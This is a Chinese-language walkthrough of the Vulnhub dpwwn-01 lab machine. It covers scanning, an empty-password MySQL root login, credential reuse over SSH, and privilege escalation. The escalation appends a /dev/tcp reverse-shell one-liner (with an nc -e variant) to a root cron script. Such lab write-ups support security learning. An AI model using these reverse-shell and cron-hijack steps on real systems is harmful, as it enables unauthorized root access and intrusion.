zoukankan      html  css  js  c++  java
  • Vulnhub-dpwwn-01靶机过关记录

    靶机地址:172.16.1.192

    Kali

    目录扫描

     

    查看info.php

     

    端口扫描

     

     开放3306,尝试弱密码或爆破mysql

    账户为root,密码为空,成功登陆。

    查看数据库;再查看ssh

     

    查看表中内容

     

    得到Mistic testP@$$swordmistic

    还开放有22端口,尝试登陆。登陆出错几次发现,账户名为小写。

    登陆成功

     

      

    尝试执行命令发现:不能执行sudo没有gitwget命令,也无法suid提权

    查看家目录下边的文件,仅有一个.sh文件

     

    使用curl,下载个枚举脚本看看

     

    赋予脚本执行权限,并执行

     

    发现在mistic用户目录下的logrot.sh是在计划任务内存中一个每3分钟以root权限运行的脚本

     

     至此有了提权思路以此由root执行的计划任务脚本为线索,利用从而得到root权限

     思路:添加使用nc反弹shell的代码到logrot.sh文件中,在kali上监听一个端口以获得shell

    先写入反向shell代码

      echo "0<&126-;exec 126<>/dev/tcp/172.16.1.107/1234;sh <&126 >&126 2>&126 " >> logrot.sh

      *格式说明:echo nc -e /bin/bash 攻击者IP 端口 > 计划任务所执行的脚本

     

     再在Kali监听端口,过一段时间后获取shell。查看为root权限

     

     最后获取flag,完成。

  • 相关阅读:
    作业 20181030-3互评Alpha版本
    Alpha阶段事后诸葛亮会议记录
    Alpha发布用户使用报告
    20181023-2 贡献分配
    作业 20181016-1 Alpha阶段贡献分配规则
    Scrum立会报告+燃尽图(十月三十日总第二十一次)
    OC中时间函数的使用
    OC中的集合详解
    面向对象的概念详解(转)
    集中类
  • 原文地址:https://www.cnblogs.com/appear001/p/12103387.html
Copyright © 2011-2022 走看看